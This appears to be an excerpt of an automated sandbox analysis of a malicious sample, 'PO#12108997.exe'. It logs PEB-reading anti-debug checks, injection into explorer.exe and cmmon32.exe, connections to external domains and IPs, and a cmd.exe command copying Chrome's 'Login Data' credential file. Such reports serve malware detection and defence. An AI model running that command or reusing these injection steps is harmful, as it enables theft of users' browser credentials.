Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h] 17_2_04B11C06
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h] 17_2_04B2740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h] 17_2_04B2740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h] 17_2_04B2740D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7746D mov eax, dword ptr fs:[00000030h] 17_2_04A7746D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h] 17_2_04A8AC7B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8A44B mov eax, dword ptr fs:[00000030h] 17_2_04A8A44B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEC450 mov eax, dword ptr fs:[00000030h] 17_2_04AEC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEC450 mov eax, dword ptr fs:[00000030h] 17_2_04AEC450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A835A1 mov eax, dword ptr fs:[00000030h] 17_2_04A835A1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h] 17_2_04A81DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h] 17_2_04A81DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h] 17_2_04A81DB5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B205AC mov eax, dword ptr fs:[00000030h] 17_2_04B205AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B205AC mov eax, dword ptr fs:[00000030h] 17_2_04B205AC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h] 17_2_04A82581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h] 17_2_04A82581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h] 17_2_04A82581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h] 17_2_04A82581
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h] 17_2_04A52D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h] 17_2_04A52D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h] 17_2_04A52D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h] 17_2_04A52D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h] 17_2_04A52D8A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8FD9B mov eax, dword ptr fs:[00000030h] 17_2_04A8FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8FD9B mov eax, dword ptr fs:[00000030h] 17_2_04A8FD9B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B08DF1 mov eax, dword ptr fs:[00000030h] 17_2_04B08DF1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6D5E0 mov eax, dword ptr fs:[00000030h] 17_2_04A6D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6D5E0 mov eax, dword ptr fs:[00000030h] 17_2_04A6D5E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h] 17_2_04B1FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h] 17_2_04B1FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h] 17_2_04B1FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h] 17_2_04B1FDE2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov ecx, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h] 17_2_04AD6DC9
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B28D34 mov eax, dword ptr fs:[00000030h] 17_2_04B28D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1E539 mov eax, dword ptr fs:[00000030h] 17_2_04B1E539
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h] 17_2_04A84D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h] 17_2_04A84D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h] 17_2_04A84D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5AD30 mov eax, dword ptr fs:[00000030h] 17_2_04A5AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04ADA537 mov eax, dword ptr fs:[00000030h] 17_2_04ADA537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7C577 mov eax, dword ptr fs:[00000030h] 17_2_04A7C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7C577 mov eax, dword ptr fs:[00000030h] 17_2_04A7C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A93D43 mov eax, dword ptr fs:[00000030h] 17_2_04A93D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD3540 mov eax, dword ptr fs:[00000030h] 17_2_04AD3540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B03D40 mov eax, dword ptr fs:[00000030h] 17_2_04B03D40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A77D50 mov eax, dword ptr fs:[00000030h] 17_2_04A77D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD46A7 mov eax, dword ptr fs:[00000030h] 17_2_04AD46A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04B20EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04B20EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04B20EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEFE87 mov eax, dword ptr fs:[00000030h] 17_2_04AEFE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A676E2 mov eax, dword ptr fs:[00000030h] 17_2_04A676E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A816E0 mov ecx, dword ptr fs:[00000030h] 17_2_04A816E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B28ED6 mov eax, dword ptr fs:[00000030h] 17_2_04B28ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A836CC mov eax, dword ptr fs:[00000030h] 17_2_04A836CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A98EC7 mov eax, dword ptr fs:[00000030h] 17_2_04A98EC7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B0FEC0 mov eax, dword ptr fs:[00000030h] 17_2_04B0FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5E620 mov eax, dword ptr fs:[00000030h] 17_2_04A5E620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B0FE3F mov eax, dword ptr fs:[00000030h] 17_2_04B0FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h] 17_2_04A5C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h] 17_2_04A5C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h] 17_2_04A5C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A88E00 mov eax, dword ptr fs:[00000030h] 17_2_04A88E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8A61C mov eax, dword ptr fs:[00000030h] 17_2_04A8A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8A61C mov eax, dword ptr fs:[00000030h] 17_2_04A8A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11608 mov eax, dword ptr fs:[00000030h] 17_2_04B11608
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6766D mov eax, dword ptr fs:[00000030h] 17_2_04A6766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04A7AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04A7AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04A7AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04A7AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04A7AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1AE44 mov eax, dword ptr fs:[00000030h] 17_2_04B1AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1AE44 mov eax, dword ptr fs:[00000030h] 17_2_04B1AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A68794 mov eax, dword ptr fs:[00000030h] 17_2_04A68794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h] 17_2_04AD7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h] 17_2_04AD7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h] 17_2_04AD7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A937F5 mov eax, dword ptr fs:[00000030h] 17_2_04A937F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A54F2E mov eax, dword ptr fs:[00000030h] 17_2_04A54F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A54F2E mov eax, dword ptr fs:[00000030h] 17_2_04A54F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8E730 mov eax, dword ptr fs:[00000030h] 17_2_04A8E730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7B73D mov eax, dword ptr fs:[00000030h] 17_2_04A7B73D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7B73D mov eax, dword ptr fs:[00000030h] 17_2_04A7B73D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8A70E mov eax, dword ptr fs:[00000030h] 17_2_04A8A70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8A70E mov eax, dword ptr fs:[00000030h] 17_2_04A8A70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7F716 mov eax, dword ptr fs:[00000030h] 17_2_04A7F716
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEFF10 mov eax, dword ptr fs:[00000030h] 17_2_04AEFF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEFF10 mov eax, dword ptr fs:[00000030h] 17_2_04AEFF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2070D mov eax, dword ptr fs:[00000030h] 17_2_04B2070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2070D mov eax, dword ptr fs:[00000030h] 17_2_04B2070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6FF60 mov eax, dword ptr fs:[00000030h] 17_2_04A6FF60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B28F6A mov eax, dword ptr fs:[00000030h] 17_2_04B28F6A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6EF40 mov eax, dword ptr fs:[00000030h] 17_2_04A6EF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A990AF mov eax, dword ptr fs:[00000030h] 17_2_04A990AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8F0BF mov ecx, dword ptr fs:[00000030h] 17_2_04A8F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8F0BF mov eax, dword ptr fs:[00000030h] 17_2_04A8F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8F0BF mov eax, dword ptr fs:[00000030h] 17_2_04A8F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A59080 mov eax, dword ptr fs:[00000030h] 17_2_04A59080
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD3884 mov eax, dword ptr fs:[00000030h] 17_2_04AD3884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD3884 mov eax, dword ptr fs:[00000030h] 17_2_04AD3884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7B8E4 mov eax, dword ptr fs:[00000030h] 17_2_04A7B8E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7B8E4 mov eax, dword ptr fs:[00000030h] 17_2_04A7B8E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h] 17_2_04A540E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h] 17_2_04A540E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h] 17_2_04A540E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A558EC mov eax, dword ptr fs:[00000030h] 17_2_04A558EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov ecx, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h] 17_2_04A8002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h] 17_2_04A8002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h] 17_2_04A8002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h] 17_2_04A8002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h] 17_2_04A8002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h] 17_2_04A6B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h] 17_2_04A6B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h] 17_2_04A6B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h] 17_2_04A6B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h] 17_2_04A7A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h] 17_2_04A7A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h] 17_2_04A7A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h] 17_2_04A7A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B24015 mov eax, dword ptr fs:[00000030h] 17_2_04B24015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B24015 mov eax, dword ptr fs:[00000030h] 17_2_04B24015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h] 17_2_04AD7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h] 17_2_04AD7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h] 17_2_04AD7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B12073 mov eax, dword ptr fs:[00000030h] 17_2_04B12073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0040ACF0 LdrLoadDll, 4_2_0040ACF0
Source: C:\Users\user\Desktop\PO#12108997.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 188.114.97.10 80
Source: C:\Windows\explorer.exe Domain query: www.tyz.world
Source: C:\Windows\explorer.exe Domain query: www.madurababe.net
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: B20000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread register set: target process: 3968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread register set: target process: 3968
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3968
Source: C:\Users\user\Desktop\PO#12108997.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: explorer.exe, 00000005.00000000.340347852.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.308579342.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.273499880.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000005.00000000.279299320.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.299907153.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.316538894.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
